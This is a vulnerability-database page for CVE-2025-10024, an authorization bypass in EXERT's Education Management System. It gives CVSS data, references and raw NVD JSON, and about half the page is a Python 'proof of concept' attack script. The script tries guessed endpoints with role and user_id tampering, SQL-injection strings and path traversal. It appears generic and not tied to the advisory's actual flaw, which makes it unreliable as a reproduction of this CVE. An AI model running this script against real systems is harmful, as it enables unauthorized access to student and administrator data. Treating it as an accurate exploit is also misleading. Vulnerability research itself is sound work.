CVE-2025-10024

Description

Authorization Bypass Through User-Controlled Key vulnerability in EXERT Computer Technologies Software Ltd. Co. Education Management System allows Parameter Injection.This issue affects Education Management System: through 23.09.2025.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

EXERT Education Management System < 23.09.2025

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10024 PoC - Authorization Bypass via Parameter Injection
# Target: EXERT Education Management System
# Type: Authorization Bypass Through User-Controlled Key

import requests
import sys

def exploit_cve_2025_10024(target_url):
    """
    Exploit for CVE-2025-10024: Authorization Bypass Through User-Controlled Key
    
    This PoC demonstrates how an attacker can bypass authentication by manipulating
    user-controlled parameters in the Education Management System.
    
    Note: This is for educational and authorized testing purposes only.
    """
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-10024")
    
    # Step 1: Attempt to identify the vulnerable endpoint
    # Common endpoints in Education Management Systems
    endpoints = [
        "/admin/dashboard",
        "/student/profile",
        "/api/user/data",
        "/portal/home"
    ]
    
    # Step 2: Try parameter injection to bypass authorization
    # Attack vectors: manipulating user_id, role, or session parameters
    
    # Method 1: Direct parameter manipulation
    payload_params = [
        {"user_id": "1"},  # Try to access admin user
        {"role": "admin"},  # Try to inject admin role
        {"auth_token": "admin_token"},  # Token manipulation
    ]
    
    for endpoint in endpoints:
        for params in payload_params:
            try:
                # Construct the attack request
                attack_url = f"{target_url}{endpoint}"
                
                # Try GET request with parameter injection
                response = requests.get(
                    attack_url,
                    params=params,
                    timeout=10,
                    verify=False
                )
                
                # Check for successful bypass indicators
                if response.status_code == 200:
                    # Look for sensitive data exposure
                    if any(keyword in response.text.lower() for keyword in 
                           ['admin', 'student', 'grade', 'personal', 'confidential']):
                        print(f"[+] Potential successful exploit at {endpoint}")
                        print(f"[+] Payload: {params}")
                        return True
                        
            except requests.RequestException as e:
                print(f"[-] Request failed: {e}")
                continue
    
    # Method 2: Try POST request with injected parameters
    post_payloads = [
        {"id": "1 OR 1=1"},  # SQL-like injection
        {"user": "admin'--"},  # Authentication bypass
        {"session": "../../admin"},  # Path traversal
    ]
    
    for endpoint in endpoints:
        for payload in post_payloads:
            try:
                attack_url = f"{target_url}{endpoint}"
                response = requests.post(
                    attack_url,
                    data=payload,
                    timeout=10,
                    verify=False
                )
                
                if response.status_code == 200:
                    print(f"[+] POST exploit may have worked at {endpoint}")
                    
            except requests.RequestException:
                continue
    
    print("[*] Exploitation attempt completed")
    print("[*] Manual verification may be required")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-10024.py <target_url>")
        print("Example: python cve-2025-10024.py http://vulnerable-site.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2025_10024(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10024
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10024
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10024/
[4] VulDB https://vuldb.com/cve/CVE-2025-10024
[5] https://www.usom.gov.tr/bildirim/tr-26-0002

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10024", "sourceIdentifier": "[email protected]", "published": "2026-01-22T12:15:53.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in EXERT Computer Technologies Software Ltd. Co. Education Management System allows Parameter Injection.This issue affects Education Management System: through 23.09.2025."}, {"lang": "es", "value": "Vulnerabilidad de elusión de autorización a través de clave controlada por el usuario en el Sistema de Gestión Educativa de EXERT Computer Technologies Software Ltd. Co. permite la inyección de parámetros. Este problema afecta al Sistema de Gestión Educativa: hasta el 23.09.2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0002", "source": "[email protected]"}]}}